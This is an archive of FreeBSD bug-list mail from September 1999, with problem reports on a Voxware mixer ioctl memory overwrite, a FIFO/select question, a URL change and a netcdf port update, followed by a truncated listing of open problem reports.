From owner-freebsd-bugs Sun Sep 5 8:16:39 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from social.snu.ac.kr (social.snu.ac.kr [147.46.226.152]) by hub.freebsd.org (Postfix) with ESMTP id 6680E1573C; Sun, 5 Sep 1999 08:16:20 -0700 (PDT) (envelope-from supercd@hanmail.net) Received: from home ([210.219.181.109]) by social.snu.ac.kr with SMTP (1.39.111.2/16.2) id AA176743750; Mon, 6 Sep 1999 00:02:30 +0900 Date: Mon, 6 Sep 1999 00:02:30 +0900 To: supercd@hanmail.net From: supercd@hanmail.net Subject: ÇÁ·Î±×·¥°ú °ÔÀÓ ¸®½ºÆ®ÀÔ´Ï´Ù. Mime-Version: 1.0 Content-Type: multipart/mixed; boundary=hhlnarkrrlgonode Content-Transfer-Encoding: 7bit Content-Transfer-Encoding: 7bit Content-Transfer-Encoding: base64 Content-Transfer-Encoding: 7bit Content-Transfer-Encoding: base64 Content-Transfer-Encoding: 7bit Content-Transfer-Encoding: 7bit Content-Transfer-Encoding: 7bit Message-Id: <19990905151634.6680E1573C@hub.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Sep 5 17:52: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1708914EA2 for ; Sun, 5 Sep 1999 17:51:59 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA95573; Sun, 5 Sep 1999 17:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from pluto.ipass.net (pluto.ipass.net [198.79.53.5]) by hub.freebsd.org (Postfix) with ESMTP id 5AE3A158FD for ; Sun, 5 Sep 1999 17:46:10 -0700 (PDT) (envelope-from rhh@ipass.net) Received: from stealth.ipass.net. (ppp-1-24.dialup.rdu.ipass.net [209.170.132.24]) by pluto.ipass.net (8.9.3/8.9.3) with ESMTP id UAA28182; Sun, 5 Sep 1999 20:45:46 -0400 (EDT) Received: (from rhh@localhost) by stealth.ipass.net. (8.9.3/8.8.8) id UAA13229; Sun, 5 Sep 1999 20:46:44 -0400 (EDT) (envelope-from rhh) Message-Id: <199909060046.UAA13229@stealth.ipass.net.> Date: Sun, 5 Sep 1999 20:46:44 -0400 (EDT) From: aa8vb@ipass.net Reply-To: aa8vb@ipass.net To: FreeBSD-gnats-submit@freebsd.org Cc: aa8vb@ipass.net X-Send-Pr-Version: 3.2 Subject: kern/13587: Voxware MIXER_READ ioctl corrupts memory Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13587 >Category: kern >Synopsis: Voxware MIXER_READ ioctl corrupts memory >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Sep 5 17:50:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Randall Hopper >Release: FreeBSD 3.2-RELEASE i386 >Organization: self >Environment: Stock 3.2-RELEASE. Voxware sound drivers. Sound Blaster 32. controller snd0 device pas0 at isa? port 0x388 irq 10 drq 3 device sb0 at isa? port 0x220 irq 5 drq 1 device sbxvi0 at isa? drq 5 device sbmidi0 at isa? port 0x330 device opl0 at isa? port 0x388 device awe0 at isa? port 0x620 >Description: int stomp_me = 0x12345678; unsigned char vol[2]; ioctl( mixer_fd, MIXER_READ( SOUND_MIXER_LINE ), vol ) The ioctl overwrites the lower two bytes of 'stomp_me'. This is how Linux apps like xmix declare vol, so apparently this is a bug in our Voxware drivers. xmix may be saved from memory corruption only by the structure alignment policy of FreeBSD. >How-To-Repeat: The output of the following program is: #include #include #include #include #include int main( int argc, char *argv[] ) { int mixer_fd, ret, ctrls; int stomp_me = 0x12345678; unsigned char vol[2]; mixer_fd = open( "/dev/mixer0", O_RDWR, 0 ); assert( mixer_fd >= 0 ); ret = ioctl( mixer_fd, SOUND_MIXER_READ_DEVMASK, &ctrls ); assert( ret >= 0 ); assert( ctrls & SOUND_MASK_LINE ); ret = ioctl( mixer_fd, MIXER_READ( SOUND_MIXER_LINE ), vol ); assert( ret >= 0 ); printf( "Volume is %d,%d\n", vol[0], vol[1] ); if ( stomp_me != 0x12345678 ) { fprintf( stderr, "\n\nWhooah! Sound ioctl() stomped memory!\n" "Value was 0x12345678, now it's 0x%.8x\n", stomp_me ); exit(1); } close( mixer_fd ); return 0; } >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Sep 5 19:32:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 88F7E15864 for ; Sun, 5 Sep 1999 19:32:11 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA01413; Sun, 5 Sep 1999 19:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from smtp.dti.ne.jp (smtp.dti.ne.jp [210.170.128.120]) by hub.freebsd.org (Postfix) with ESMTP id 40AF315799 for ; Sun, 5 Sep 1999 19:20:12 -0700 (PDT) (envelope-from shigio@tamacom.com) Received: from choota.signet.or.jp (PPP66.tama-ap5.dti.ne.jp [210.170.192.84]) by smtp.dti.ne.jp (8.9.0/3.7W) with ESMTP id LAA17794 for ; Mon, 6 Sep 1999 11:19:57 +0900 (JST) Received: (from shigio@localhost) by choota.signet.or.jp (8.8.8/) id LAA00837; Mon, 6 Sep 1999 11:17:43 +0900 (JST) Message-Id: <199909060217.LAA00837@tamacom.com> Date: Mon, 6 Sep 1999 11:17:43 +0900 (JST) From: shigio@tamacom.com Reply-To: shigio@tamacom.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/13589: GLOBAL's home page changed. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13589 >Category: misc >Synopsis: description of URL is old. >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Sep 5 19:30:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Shigio Yamaguchi >Release: FreeBSD-stable, FreeBSD-current >Organization: Tama Communications Corporation >Environment: >Description: GLOBAL's home page was moved to http://www.tamacom.com/global/ and the author's mail address to shigio@tamacom.com. Please change description of '/usr/src/contrib/global/FREEBSD-upgrade'. Thank you. >How-To-Repeat: >Fix: [/usr/src/contrib/global/FREEBSD-upgrade] Please submit changes to GLOBAL's author, Shigio Yamaguchi for inclusion in his next release. The most recent release of GLOBAL is available at the author's web page: http://wafu.netgate.net/tama/unix/indexe.html | v Please submit changes to GLOBAL's author, Shigio Yamaguchi for inclusion in his next release. The most recent release of GLOBAL is available at the author's web page: http://www.tamacom.com/global/ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Sep 5 23: 3:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 62431152F5; Sun, 5 Sep 1999 23:03:45 -0700 (PDT) (envelope-from simokawa@FreeBSD.org) Received: (from simokawa@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA17569; Sun, 5 Sep 1999 23:03:45 -0700 (PDT) (envelope-from simokawa@FreeBSD.org) Date: Sun, 5 Sep 1999 23:03:45 -0700 (PDT) From: Message-Id: <199909060603.XAA17569@freefall.freebsd.org> To: shigio@tamacom.com, simokawa@FreeBSD.org, freebsd-bugs@FreeBSD.org, simokawa@FreeBSD.org Subject: Re: misc/13589: description of URL is old. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: description of URL is old. State-Changed-From-To: open->analyzed State-Changed-By: simokawa State-Changed-When: Sun Sep 5 22:59:16 PDT 1999 State-Changed-Why: I'll take care of this. I have a plan to import and MFC recent version of global after 3.3-RELEASE. Responsible-Changed-From-To: freebsd-bugs->simokawa Responsible-Changed-By: simokawa Responsible-Changed-When: Sun Sep 5 22:59:16 PDT 1999 Responsible-Changed-Why: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 0:20:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0CF6C152F3 for ; Mon, 6 Sep 1999 00:20:15 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA32149; Mon, 6 Sep 1999 00:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 397DE1520F; Mon, 6 Sep 1999 00:18:01 -0700 (PDT) Message-Id: <19990906071801.397DE1520F@hub.freebsd.org> Date: Mon, 6 Sep 1999 00:18:01 -0700 (PDT) From: tarkhil@asteroid.svib.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/13593: Problems with FIFO and select Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13593 >Category: kern >Synopsis: Problems with FIFO and select >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Sep 6 00:20:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Alex Povolotsky >Release: 3.2-STABLE >Organization: >Environment: FreeBSD shuttle.svib.ru 3.0-19990619-STABLE FreeBSD 3.0-19990619-STABLE #0: Thu Jun 24 21:26:37 MSD 1999 root@shuttle.svib.ru:/mnt/usr/src/sys/compile/SHUTTLE i386 >Description: Attempt to open FIFO file with O_WRONLY|O_NONBLOCK results in Device not configured error. However, when FIFO is opened with O_RDWR and O_NONBLOCK, every attempt to select(2) its handler for writing doesn't wait until someone opens FIFO for reading, but instead FIFO is ready to write at every select. >How-To-Repeat: #include #include main() { int control; if ((control = open("STATUS",O_WRONLY|O_NONBLOCK))<0) { perror("Could not open STATUS "); exit(1); } printf("STATUS ready\n"); close(control); return(0); } >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 0:50:48 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 469B01508A for ; Mon, 6 Sep 1999 00:50:47 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA35671; Mon, 6 Sep 1999 00:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Mon, 6 Sep 1999 00:50:01 -0700 (PDT) Message-Id: <199909060750.AAA35671@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: kern/13593: Problems with FIFO and select Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13593; it has been noted by GNATS. From: Bruce Evans To: freebsd-gnats-submit@FreeBSD.ORG, tarkhil@asteroid.svib.ru Cc: Subject: Re: kern/13593: Problems with FIFO and select Date: Mon, 6 Sep 1999 17:46:06 +1000 >>Description: >Attempt to open FIFO file with O_WRONLY|O_NONBLOCK results in Device >not configured error. This is because there is no reader when the FIFO is opened for writing (O_WRONLY opens of FIFOs normally block waiting for a reader, but O_NONBLOCK gives an error instead). >However, when FIFO is opened with O_RDWR and O_NONBLOCK, every attempt >to select(2) its handler for writing doesn't wait until someone opens >FIFO for reading, but instead FIFO is ready to write at every select. This is because O_RDWR gives both a reader and a writer. Summary: not a FreeBSD bug. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 10:20:44 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 714CF1546F for ; Mon, 6 Sep 1999 10:20:40 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA54020; Mon, 6 Sep 1999 10:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 8ACC015424; Mon, 6 Sep 1999 10:11:44 -0700 (PDT) Message-Id: <19990906171144.8ACC015424@hub.freebsd.org> Date: Mon, 6 Sep 1999 10:11:44 -0700 (PDT) From: tkato@prontimail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/13598: Update port: math/netcdf to 3.5b2 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13598 >Category: misc >Synopsis: Update port: math/netcdf to 3.5b2 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Sep 6 10:20:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.2-RELEASE >Organization: >Environment: >Description: * Updated version 3.5b1 to 3.5b2 >How-To-Repeat: >Fix: begin 644 netcdf.patch.gz M'XL("$;PTS<"`VYE=&-D9BYP871C:`"%4EUOFS`4?<:_XDKMPR8*&!M*0,N4 MK"%1-B6;`ENKO50&+BEJ$JB#]_'O9Y)L[:JDE2R,SKWG?AR?HBI+L)2<@Z.V MTFEJV6Z=M6COG`VV>5$Z,W&/9;5".`82R[)>(QK76,!0+8'YX(:1/ISKGS`D MIFD>K6JD"B'!!B``2B.F2=Z>,1B`Y5ZX',S==S`@<`9S_`F[]I#7JQ7F;55O M=-W#V&4M(V/?@%AG\`WEMHM+?%"5Q"(RN.U;&;;")>9+8=:U&HD6(9>H+QTR M6`@?U>KW?C8=OKZKUQHV4GV++4Q0CW.OUO"N70[&$O%#,K)KN7RO<[OT\P,6 MP6GU+GZ`:[-=!X?V'*TA#2*7132$.I,5;B#^U<#YKB*Q1M,DG0]G,V.GB$8*'XZB M+]GQ7Y(QEE7W;,`I,-YIZ9_PXR/E?T-R&KF])X;4;NRL:,U&/KQY+OQ^M;?0 M!Z^DU,V1!9AGOBBY&WH^I^BYG'H9YP4QCQ5@3PH(UPM8#WW$O+ST@I"&?AX6 1E\SW:5!Z@OP!Z1B%[LT#``"Y ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Sep 6 11: 4:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 83351154A8 for ; Mon, 6 Sep 1999 11:03:21 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA56799 for freebsd-bugs@freebsd.org; Mon, 6 Sep 1999 11:02:38 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 6 Sep 1999 11:02:38 -0700 (PDT) Message-Id: <199909061802.LAA56799@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1996/12/20] bin/2258 wollman route add/delete [network] xxx.yyy.zzz.0 o [1997/03/08] kern/2923 panic: vm_fault: fault on nofault entry, o [1997/07/03] kern/4021 peter Local mount of a local NFS exported direc o [1997/07/31] kern/4200 peter NFS: "vm_fault: fault on nofault entry" w o [1997/10/01] kern/4673 Two panics, now crash dumps, always in re o [1997/11/10] kern/4996 peter NFS crash, possibly related to file bigge o [1997/11/24] bin/5139 sheldonh portmap does not find interfaces correctl f [1997/12/21] kern/5355 Fix for NULLFS problems o [1998/02/03] kern/5641 peter running processes at the IDLE priority (i o [1998/02/10] kern/5703 CDROM Media Error triggers complete syste o [1998/03/23] bin/6121 peter gethostbyname(3) no longer returns NO_DAT s [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/06/23] kern/7028 Panic in vinvalbuf when appending/looking o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/08/15] kern/7622 Kernel panic with Fatal trap 18. f [1998/09/03] kern/7822 n_hibma Machine Reboots without reason o [1998/09/06] kern/7843 Unable to install FreeBSD on Tekram DC-39 o [1998/09/08] i386/7859 luigi fatal trap 12 in midi_synth_input f [1998/09/14] kern/7927 n_hibma Fatal trap 12: page fault while in kernel o [1998/09/28] kern/8074 se CAM rescan operation fatal o [1998/10/03] gnu/8138 peter gcc -pipe xxx.s hangs f [1998/10/06] i386/8179 Install failure with motherbord using SIS f [1998/10/08] i386/8214 n_hibma Install 3.0-19981006-BETA fails f [1998/11/04] conf/8576 n_hibma server goes down when client mount its fi a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails f [1998/11/12] i386/8673 bug in vm_page_alloc_contig() o [1998/11/24] ports/8829 torstenb Fix port: security/ssh f [1998/11/25] kern/8861 n_hibma under heavy (multi interface) traffic ep0 o [1998/12/05] kern/8973 trap 12: page fault while in kernel mode f [1998/12/09] kern/9036 Boot 3.0-Release hangs with BT-445S after a [1999/01/05] kern/9334 n_hibma cp fails for 2048 Bytes/sector media a [1999/01/26] i386/9709 n_hibma Kernel page faults during boot with 2GB R o [1999/01/27] kern/9742 tx driver for smc autodetects fine, but n o [1999/02/02] misc/9885 BIND 8.1.2 core dumping o [1999/02/04] kern/9909 Writing incomplete blocks to /dev/nrst0 h o [1999/02/19] kern/10166 panic during heavy sio i/o;no coproc; ves o [1999/02/20] kern/10172 panic: cannot allocate pipe - out of kvm a [1999/02/21] i386/10188 n_hibma Cannot get system to boot after Installti o [1999/02/23] kern/10224 panic: pipeinit: cannot allocate pipe -- s [1999/02/26] kern/10281 Crash of 3.1-STABLE system due to scsi er o [1999/02/26] i386/10282 PCMCIA problems in 3.1-RELEASE? o [1999/03/01] kern/10332 gibbs System freezes during certain SCSI activi o [1999/03/01] bin/10344 fenner Core dump in gethostbyaddr for 199.93.70. o [1999/03/05] kern/10397 3.1R page fault while in kernel mode, fro o [1999/03/07] misc/10473 Incorrect aout compat libraries in XF8633 o [1999/03/09] kern/10507 Process hangs in state VM pgd o [1999/03/09] misc/10509 Cvs can hang system when used with pserve o [1999/03/09] kern/10520 can't exec files under nullfs o [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 When a fork/exec stress test is run, the o [1999/03/12] misc/10566 obrien patch dhcpc problem on /etc/pccard_ether o [1999/03/17] kern/10636 ipfw problems o [1999/03/19] i386/10683 I have a buslogic BT-948 FW controller. W o [1999/03/20] i386/10690 Installation freezes after device selecti f [1999/03/20] kern/10701 ppbus printing problems o [1999/03/22] ports/10725stb Wrong Cyrus IMAP deliver group o [1999/03/23] bin/10744 call to login() from aout/libutil.so.2.2 o [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/29] kern/10866 ahc2740 panic o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi o [1999/04/05] kern/10959 3.1-STABLE crashes due to a floppy mount o [1999/04/05] ports/10965obrien lcc-3.6 unable to compile anything o [1999/04/08] kern/11023 Synchronous PPP not functional in leased o [1999/04/13] kern/11112 Amanda on FreeBSD can wipe the _next_ tap o [1999/04/16] kern/11180 boot of fresh bsd3.1 hangs o [1999/04/17] kern/11196 n_hibma kernel mode page fault o [1999/04/19] misc/11216 Power fail versus Fsck changed my life. o [1999/04/19] kern/11226 Invalid files on disk after fsync o [1999/04/20] kern/11238 Synchronous PPP not functional in leased o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/04/21] i386/11268 DEC FDDI PCI Adapter doesn't work... o [1999/04/22] i386/11278 FreeBSD Version 3.1 reboots repeatedly (c o [1999/04/23] i386/11298 Enabling IDE DMA on Opti Viper-M crashes o [1999/04/26] kern/11330 page fault in generic_bzero o [1999/04/26] bin/11335 find hangs in `nfsrcv' on local filesyste o [1999/04/26] conf/11343 worm; problems with installation and boot o [1999/04/26] i386/11349 Error Mounting /dev/wd0s1 on dist during o [1999/04/27] kern/11351 system reboot for error with popper and d o [1999/05/01] kern/11434 can't boot from wd0s2a o [1999/05/03] kern/11470 V3 NFS problem o [1999/05/04] i386/11488 Error while starting FreeBSD o [1999/05/06] kern/11533 NFS v3 locks up on large file transfers o [1999/05/10] kern/11629 File descriptor table sharing is broken o [1999/05/12] kern/11680 server freezes, all processes stuck in "i o [1999/05/13] i386/11681 gibbs Adaptec 2940 UW SCSI Controller BIOS 1.34 o [1999/05/14] kern/11707 ncr isn't recognized in 3.1-19990512-STAB f [1999/05/17] bin/11744 perllib fails to build o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/26] kern/11891 typo in ioconf.c o [1999/05/31] kern/11966 TCP copies send and receive socket buffer f [1999/06/01] kern/11984 pthread_kill cannot kill select() threads o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br o [1999/06/02] kern/11993 panic: getnewbuf: inconsistent EMPTY queu f [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/06] conf/12050 No /sbin/init on fixit flop o [1999/06/07] kern/12072 vm_fault happened in binary file transfer o [1999/06/09] ports/12098se KDM not config'd properly o [1999/06/09] kern/12106 error 6: panic: cannot mount root o [1999/06/10] kern/12127 persistent crash on idle SMP system o [1999/06/15] kern/12233 Fvwm2 causes FreeBSD-current to hang or r o [1999/06/16] bin/12243 NFS re-mount from Solaris 7 server hangs o [1999/06/16] kern/12248 CRON in malloc(): warning: pointer to wr o [1999/06/16] kern/12251 slattach followed by ifconfig sl0 doesn't o [1999/06/17] bin/12259 SL/IP install doesn't work due to ifconfi o [1999/06/18] i386/12286 Segmentation violation when invoking JNI s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] misc/12390 Installation hangs during extraction o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623alpha Certain valid numeric strings cause a SIG f [1999/07/20] misc/12720 gdbm (And possibly other libraries in /us o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/07/21] misc/12743 Cannot boot the 3.2 floppies o [1999/07/21] ports/12748marcel linux_base-5.2 and linux communicator pro f [1999/07/23] i386/12777 sheldonh 3.1 RELEASE -> 3.2 upgrade is incomplete, o [1999/07/26] bin/12819 billf tcpd hosts.[allow|deny] location inconsis o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/04] kern/12980 NetGear Dec 21140AF Ethernet Card unrecog o [1999/08/06] bin/12998 des still inetd junk pointer too low to make o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [1999/08/11] kern/13075 signal is not posted for async I/O on raw o [1999/08/16] kern/13174 3.- branch hardware probe does not detect o [1999/08/17] ports/13206ports ports/devel/bcc doesn't support 'long lon o [1999/08/17] ports/13216ports stunnel does not build from the port coll o [1999/08/20] kern/13270 NFS hangs if written through self-mount o [1999/08/22] kern/13322 FreeBSD freezes when using the soundcard o [1999/08/23] alpha/13338alpha panic: pmap_remove_all: pv_table for 162b o [1999/08/24] kern/13352 No support for Promise Ultra/66 o [1999/08/30] misc/13474 Maximum Number of IPs Permitted in the .. o [1999/08/31] misc/13487 boot problem o [1999/08/31] kern/13488 panic: getnewbuf: 133 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/03/20] kern/260 davidg msync and munmap don't bother to update m o [1995/10/18] bin/786 wpaul Problem with NIS and large group maps f [1996/05/26] kern/1256 ZNYX 314 mysterously looses packets o [1996/06/07] kern/1301 davidg DEC FDDI/PCI Adapter: halt code = 6 (DMA f [1996/08/03] bin/1461 Incorrect address binding of Kerberized r o [1996/08/22] kern/1533 Machine can be panicked by a userland pro o [1996/09/29] kern/1689 wollman TCP extensions throttles distant connecti o [1996/10/04] kern/1726 panic in kmem_malloc (dump available) o [1996/10/08] kern/1744 peter run queue or proc list smashed 4 times in f [1996/10/21] kern/1856 peter read-only nfs mount: panic leaf should be s [1996/10/26] bin/1892 n_hibma install(1) removes target file s [1996/11/08] gnu/1981 ypserv handles null key incorrectly a [1996/11/14] kern/2014 sos Console keyboard lockup problem o [1996/11/18] kern/2053 peter de0 driver don't work at 100M for Compex o [1996/12/22] kern/2270 Hayes ESP serial card locks system as of a [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA f [1997/01/03] conf/2367 gibbs Buslogic SCSI driver bad probe of 742A EI f [1997/01/09] bin/2430 grog mountd stops on loading if subnet mask is a [1997/01/21] bin/2549 sos cdcontrol refuses to play audio CDs from s [1997/02/03] kern/2647 changing existing route to -static crashe o [1997/02/05] kern/2667 wollman bpfattach can hang the system a [1997/02/06] kern/2675 lkmcioctl() is not consistent and careful o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/08] kern/2695 sio1 (16540 serial port) is not recognize o [1997/02/09] kern/2698 After rewind I cannot read a tape; blocks o [1997/02/12] kern/2719 added support for magneto-optical SCSI di o [1997/02/15] kern/2742 panic: leaf should be empty o [1997/02/15] bin/2747 davidn cannot submit at jobs from within an at j o [1997/02/16] gnu/2749 peter cvs export using remote cvs fails - CVS/T o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/19] bin/2769 fsck needs several runs to clean up bad/d o [1997/02/19] kern/2770 panic: vm_fault: fault on nofault entry o [1997/02/19] kern/2771 panic: bad dir o [1997/02/19] kern/2773 peter bad dir panic o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable o [1997/02/20] gnu/2786 gcc version 2.7.2.1 C compiler slows down o [1997/02/22] kern/2800 DDS large data writing probrem o [1997/03/01] kern/2840 mlock+minherit+fork+munlock causes panics o [1997/03/03] kern/2858 peter FreeBSD NFS client can't mount filesystem o [1997/03/04] kern/2873 the od0 devies does not handle a Maxoptix o [1997/03/08] kern/2919 vm_fault: fault on nofault entry, addr: f o [1997/03/11] bin/2948 can't dump 640MB optical disks o [1997/03/12] kern/2965 st0 hang/fail on reading 4mm DAT tape for o [1997/03/15] kern/2991 RTF_LLINFO routes remain when interface i o [1997/03/18] kern/3021 panic after sync during reboot o [1997/03/21] bin/3055 umount -f does not work o [1997/04/01] bin/3170 vi freaks and dump core if user doesn't e o [1997/04/05] kern/3201 peter de0 not re-enabled after hub down o [1997/04/06] kern/3216 panic: pmap_zero_page: CMAP busy o [1997/04/06] kern/3219 sppp or arnet gets looped after connectio o [1997/04/15] bin/3305 Can't do encrypted rlogin into self o [1997/04/25] kern/3381 peter 2.2.x kernel panic on traversing and remo o [1997/04/25] kern/3384 telldir-seekdir can cause livelock o [1997/05/01] gnu/3441 obrien C++ exceptions don't work in shared libra o [1997/05/01] kern/3463 netstat -I packet count increase on sl0 w f [1997/05/04] i386/3502 Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/05/07] kern/3527 peter if_de.c doesn't recognize Kingston card p o [1997/05/09] kern/3564 using MPU401 driver pagefaults kernel o [1997/05/09] kern/3569 ex0 driver doesn't work with EtherExpress o [1997/05/12] kern/3579 peter de driver doesn't support newer SMC 9332 o [1997/05/12] kern/3581 intermittent trap 12 in lockstatus() o [1997/05/12] kern/3582 panic: bad dir (mangled entry) in 2.2-STA s [1997/05/25] kern/3685 [PATCH] panic: fdesc attr o [1997/05/30] kern/3726 peter process hangs in 2.2-stable when working o [1997/05/30] kern/3727 SCSI II tape support broken o [1997/06/03] kern/3771 NFS hangs when writing to local FS re-mou o [1997/06/04] i386/3779 changing cursor 